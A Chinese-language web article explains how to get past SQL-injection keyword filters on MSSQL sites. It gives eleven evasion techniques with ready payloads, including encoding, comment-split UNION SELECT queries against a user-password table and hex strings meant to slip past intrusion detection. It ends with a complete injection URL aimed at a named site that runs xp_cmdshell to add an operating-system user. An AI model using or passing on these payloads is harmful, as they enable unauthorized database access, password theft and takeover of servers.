sql注入:注入限制绕过

来源:安全中国

突然想我们是否可以用什么思路方法绕过SQL注入限制呢?到网上考察了提到思路方法大多都是针对AND和“’”号和“=”号过滤突破虽然有点进步地方但还是有些关键字没有绕过由于我不常入侵网站WebSite所以也不敢对上述过滤效果进行评论但是可以肯定效果不会很好…… 

经过我收集大部分防注入都过滤了以下关键字: 

and | select | update | chr | delete | %20from | ; | insert | mid | master. |  | = 

而这里最难处理就是select这个关键字了那么我们怎样来突破他们呢?问题虽未完全解决但还是说出来和大家分享希望能抛砖引玉 

对于关键字过滤以下是我收集以及我个人些想法 

1、运用编码技术绕过 

如URLEncode编码ASCII编码绕过例如or 1=1即

%6f%72%20%31%3d%31而Test也可以为CHAR(101)+CHAR(97)+CHAR(115)+CHAR(116)


2、通过空格绕过 

如两个空格代替个空格用Tab代替空格等或者删除所有空格

or’ swords’ =‘swords’ 
由于mssql松散性我们可以把or ’swords’ 的间空格去掉并不影响运行 

3、运用串判断代替 

用经典or 1=1判断绕过,如

or ’swords’ =’swords’
这个思路方法就是网上在讨论 

4、通过类型转换修饰符N绕过 

可以说这是个不错想法他除了能在某种程度上绕过限制而且还有别作用大家自己好好想想吧有关利用如or ’swords’ = N’ swords’ 大写N告诉mssql server 串作为nvarchar类型它起到类型转换作用并不影响注射语句本身但是可以避过基于知识模式匹配IDS 

5、通过+号拆解串绕过 

效果值得考证但毕竟是种思路方法如 

or ’swords’ =‘sw’ +’ ords’ ;EXEC(‘IN’ +’ SERT INTO ’+’ …..’ ) 


6、通过LIKE绕过 

以前如何就没想到呢?如or 

’swords’ LIKE ’sw’
!!!显然可以很轻松绕过

“=”“>”
限制…… 

7、通过IN绕过 

和上面LIKE思路差不多,如

or ’swords’ IN (’swords’) 


8、通过BETWEEN绕过 



or ’swords’ BETWEEN ’rw’ AND ’tw’ 


9、通过>或者<绕过 

or ’swords’ > ’sw’ 
or ’swords’ < ’tw’ 
or 1<3 

…… 

10、运用注释语句绕过 

用/**/代替空格如:

UNION /**/ Select /**/userpwdfrom tbluser 


用/**/分割敏感词如:

U/**/ NION /**/ SE/**/ LECT /**/userpwd from tbluser 


11、用HEX绕过IDS都无法检测出来 

0x730079007300610064006D0069006E00 =hex(sysadmin) 
0x640062005F006F0077006E0065007200 =hex(db_owner) 

另外有关通用点过滤思路方法我们可以考虑采用赋值思路方法例如先声明个变量a然后把我们指令赋值给a然后变量a最终执行我们输入命令变量a可以是任何命令如下: 

  declare @a sysname 
  select @a= 
  exec master.dbo.xp_cmdshell @a 

效果

http://www.ilikeplmm.com/show.asp?id=1;declare%20@a% 20sysname%20select%20@a=0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400%20exec%20master.dbo.xp_cmdshell%20@a;-- 


其中 

0x6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400
就是

“net user angel pass /add”
意思 



  • 篇文章: 网站WebSiteSQL脚本注入不常见思路方法

  • 篇文章: 修改破解MYSQL密码思路方法大全
  • Tags:  sql注入工具 注入工具 啊d注入工具 sql注入

    延伸阅读

    最新评论

    发表评论